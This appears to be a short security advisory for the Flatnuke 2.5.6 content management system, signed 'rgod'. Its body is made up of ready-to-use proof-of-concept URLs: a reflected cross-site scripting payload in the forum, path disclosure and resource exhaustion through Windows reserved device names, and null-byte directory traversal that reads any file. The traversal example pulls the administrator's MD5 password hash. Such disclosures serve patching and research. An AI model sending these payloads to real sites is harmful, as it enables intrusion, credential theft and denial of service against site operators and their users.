Flatnuke 2.5.6 Underlying system information disclosure / Administrative & users credentials disclosure / cross site scripting / path disclosure / resource consumption poc (tested on Windows) software: site: http://flatnuke.sourceforge.net/flatnuke/ 1) cross site scripting: http://[target]/[path]/forum/index.php?op=vis_reg&usr=";><script>alert('LOL%20%20')</script><!-- 2) path disclosure: 2.a) http://[target]/[path]/print.php?news=com1%00&mod=whatever and so on calling MS-DOS reserved device name for news parameter... 2.b) http://[target]/[path]/index.php?mod=read&id=whatever 3) resource consumption: on Windows: http://[target]/[path]/print.php?news=con%00&mod=ciao http://[target]/[path]/index.php?mod=read&id=../forum/users/con%00 4) a user can retrieve any file on target system using null byte (%00), example admin MD5 password hash disclosure: http://[target]/[path]/index.php?mod=read&id=../forum/users/admin.php%00 generally: http://[target]/[path]/index.php?mod=read&id=../forum/users/[user].php%00 rgod site: http://rgod.altervista.org mail: retrogod@xxxxxxxxxxxxx
